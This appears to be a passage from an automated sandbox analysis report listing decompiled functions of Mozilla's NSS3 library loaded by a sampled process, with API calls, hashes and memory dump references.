                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4D4FC8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                                          • String ID: %s=%c%s%c$%s=%s$oSMl"
                                                                                                                                                                                                                          • API String ID: 2709355791-1484050375
                                                                                                                                                                                                                          • Opcode ID: c0ad453cd94a9f9862dbaa5edeb0258d751fa45ab1d29b95975039002bf5313f
                                                                                                                                                                                                                          • Instruction ID: 3f7a00d608988b5663deb7cce9859a559b37e72c5f25601889a3d6d9d7e3ae3c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0ad453cd94a9f9862dbaa5edeb0258d751fa45ab1d29b95975039002bf5313f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85515C31A041469BEF01DB69C8B0FFF7BF19F4638AF1A5129E894A7B40D335B8058791
                                                                                                                                                                                                                          Function 6C4FEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FEF6D
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • htonl.WSOCK32(00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FEFE4
                                                                                                                                                                                                                          • htonl.WSOCK32(?,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FEFF1
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,6C51A4A1,?,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FF00B
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C51A4A1,?,00000000,?,00000001), ref: 6C4FF027
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: htonlmemcpy$ErrorValue
                                                                                                                                                                                                                          • String ID: dtls13
                                                                                                                                                                                                                          • API String ID: 242828995-1883198198
                                                                                                                                                                                                                          • Opcode ID: 6d1b5232ed972261d6e72c8c9c048d8b2713fc0b29627d2e115d3eb54547cd89
                                                                                                                                                                                                                          • Instruction ID: b8ec734ec729fbce2a28e3717a83cf3c54a99397a333fa1d3a353a05e998cb50
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d1b5232ed972261d6e72c8c9c048d8b2713fc0b29627d2e115d3eb54547cd89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1131D271A01211AFDB10DF28DC80F8AB7E4AF89349F158029E8289B751E731ED16CBE1
                                                                                                                                                                                                                          Function 6C47AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C47AFBE
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C599500,6C473F91), ref: 6C47AFD2
                                                                                                                                                                                                                            • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C47B007
                                                                                                                                                                                                                            • Part of subcall function 6C4C6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C471666,?,6C47B00C,?), ref: 6C4C6AFB
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C47B02F
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C47B046
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C47B058
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C47B060
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                          • API String ID: 3627567351-3315324353
                                                                                                                                                                                                                          • Opcode ID: 187e043d834ae8a207a1ccc8ae21e98c9e4f9299d7a0b5f1b652720b96946a85
                                                                                                                                                                                                                          • Instruction ID: 0fbd463341f5ea9942369b7b36b58f9ed84646e97d602dae5a661815a081cf9d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 187e043d834ae8a207a1ccc8ae21e98c9e4f9299d7a0b5f1b652720b96946a85
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2331E5704043409BDB20CF149C49FEA77B4AF8636CF10465DE8B59BBD1E332950987A7
                                                                                                                                                                                                                          Function 6C473E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4740D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C473F7F,?,00000055,?,?,6C471666,?,?), ref: 6C4740D9
                                                                                                                                                                                                                            • Part of subcall function 6C4740D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C471666,?,?), ref: 6C4740FC
                                                                                                                                                                                                                            • Part of subcall function 6C4740D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C471666,?,?), ref: 6C474138
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C473EC2
                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C473ED6
                                                                                                                                                                                                                            • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C473EEE
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C473F02
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C473F14
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C473F1C
                                                                                                                                                                                                                            • Part of subcall function 6C4D64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C4D127C,00000000,00000000,00000000), ref: 6C4D650E
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C473F27
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                          • API String ID: 1076417423-3315324353
                                                                                                                                                                                                                          • Opcode ID: a855ac122bc101631abbaa5509484ca7b87e36a363aab6dc4c185e2c51510785
                                                                                                                                                                                                                          • Instruction ID: fd11ff5774cf83a601aa82a0b8fcfad80edeea7057d03f756ad38dee1563a64f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a855ac122bc101631abbaa5509484ca7b87e36a363aab6dc4c185e2c51510785
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6821F8B1904300ABD714DB15AC11FAB77B8EB4435CF05093DF949A7741F731A91887DA
                                                                                                                                                                                                                          Function 6C4BCC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C4BCD08
                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C4BCE16
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4BD079
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DoesErrorK11_MechanismValuememcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1351604052-0
                                                                                                                                                                                                                          • Opcode ID: 8f982f5ba810317abeac41c5032d8b7ec6957f892504efb866a347ddc2f3d1eb
                                                                                                                                                                                                                          • Instruction ID: 1449564201a83ca7424df0d8c5bcc67a878503defd01dc3019da259cf4db8f6d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f982f5ba810317abeac41c5032d8b7ec6957f892504efb866a347ddc2f3d1eb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7C15CB5A002199BDB20DF24CC84FDAB7B4AB48318F1541A8E948A7741E775EE95CFE0
                                                                                                                                                                                                                          Function 6C4ADC60 Relevance: 13.7, APIs: 9, Instructions: 245memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6C4B97C1,?,00000000,00000000,?,?,?,00000000,?,6C497F4A,00000000), ref: 6C4ADC68
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADD36
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADE2D
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADE43
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADE76
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADF32
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADF5F
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADF78
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4ADFAA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_Util$memcpy$Valuemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1886645929-0
                                                                                                                                                                                                                          • Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                          • Instruction ID: b5b7dba26cc6bef2a4ae32a9ebba661c24efdb914a3c4a61a195d7ae517043d8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2681B570606A008BFF14CED9C890F5B7692DB7434AF24843ADD5ACAFE9E774D486C642
                                                                                                                                                                                                                          Function 6C483C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C483C76
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C483C94
                                                                                                                                                                                                                            • Part of subcall function 6C4795B0: TlsGetValue.KERNEL32(00000000,?,6C4900D2,00000000), ref: 6C4795D2
                                                                                                                                                                                                                            • Part of subcall function 6C4795B0: EnterCriticalSection.KERNEL32(?,?,?,6C4900D2,00000000), ref: 6C4795E7
                                                                                                                                                                                                                            • Part of subcall function 6C4795B0: PR_Unlock.NSS3(?,?,?,?,6C4900D2,00000000), ref: 6C479605
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C483CB2
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C483CCA
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C483CE1
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C49AE42), ref: 6C4830AA
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4830C7
                                                                                                                                                                                                                            • Part of subcall function 6C483090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C4830E5
                                                                                                                                                                                                                            • Part of subcall function 6C483090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C483116
                                                                                                                                                                                                                            • Part of subcall function 6C483090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C48312B
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PK11_DestroyObject.NSS3(?,?), ref: 6C483154
                                                                                                                                                                                                                            • Part of subcall function 6C483090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C48317E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3167935723-0
                                                                                                                                                                                                                          • Opcode ID: 9725eb3c823ca89980d53cde6801e518cadd7fe8be122ede97fa867abd031ad9
                                                                                                                                                                                                                          • Instruction ID: 881ce6a4a80df15194f8cb6080a8cce3418c626b5e3f2c343c369ecfaa999f07
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9725eb3c823ca89980d53cde6801e518cadd7fe8be122ede97fa867abd031ad9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2661B2B5A01201ABEF11DE65DC41FAB76B9EF14748F084428EE0AAAB52F731D914C7F1
                                                                                                                                                                                                                          Function 6C4C3D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: PK11_GetAllTokens.NSS3 ref: 6C4C3481
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C4C34A3
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: TlsGetValue.KERNEL32 ref: 6C4C352E
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: EnterCriticalSection.KERNEL32(?), ref: 6C4C3542
                                                                                                                                                                                                                            • Part of subcall function 6C4C3440: PR_Unlock.NSS3(?), ref: 6C4C355B
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4C3D8B
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4C3D9F
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4C3DCA
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4C3DE2
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C4C3E4F
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4C3E97
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4C3EAB
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4C3ED6
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4C3EEE
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2554137219-0
                                                                                                                                                                                                                          • Opcode ID: 9d9261a68fae56e545f5af8a436bcdca42c2f0ac990d11ee7667485f96226cb8
                                                                                                                                                                                                                          • Instruction ID: 48a1bf3b4a1d10d8a348e3903475fae31ad35f6412a06c5e2ca806bcb38ec5f5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d9261a68fae56e545f5af8a436bcdca42c2f0ac990d11ee7667485f96226cb8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78512579B006109FEB01EF69DC44FA673B4AF45319F060528DE095BB22EB31E944CBD2
                                                                                                                                                                                                                          Function 6C472C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(92AB236F), ref: 6C472C5D
                                                                                                                                                                                                                            • Part of subcall function 6C4D0D30: calloc.MOZGLUE ref: 6C4D0D50
                                                                                                                                                                                                                            • Part of subcall function 6C4D0D30: TlsGetValue.KERNEL32 ref: 6C4D0D6D
                                                                                                                                                                                                                          • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C472C8D
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C472CE0
                                                                                                                                                                                                                            • Part of subcall function 6C472E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C472CDA,?,00000000), ref: 6C472E1E
                                                                                                                                                                                                                            • Part of subcall function 6C472E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C472E33
                                                                                                                                                                                                                            • Part of subcall function 6C472E00: TlsGetValue.KERNEL32 ref: 6C472E4E
                                                                                                                                                                                                                            • Part of subcall function 6C472E00: EnterCriticalSection.KERNEL32(?), ref: 6C472E5E
                                                                                                                                                                                                                            • Part of subcall function 6C472E00: PL_HashTableLookup.NSS3(?), ref: 6C472E71
                                                                                                                                                                                                                            • Part of subcall function 6C472E00: PL_HashTableRemove.NSS3(?), ref: 6C472E84
                                                                                                                                                                                                                            • Part of subcall function 6C472E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C472E96
                                                                                                                                                                                                                            • Part of subcall function 6C472E00: PR_Unlock.NSS3 ref: 6C472EA9
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C472D23
                                                                                                                                                                                                                          • CERT_IsCACert.NSS3(00000001,00000000), ref: 6C472D30
                                                                                                                                                                                                                          • CERT_MakeCANickname.NSS3(00000001), ref: 6C472D3F
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C472D73
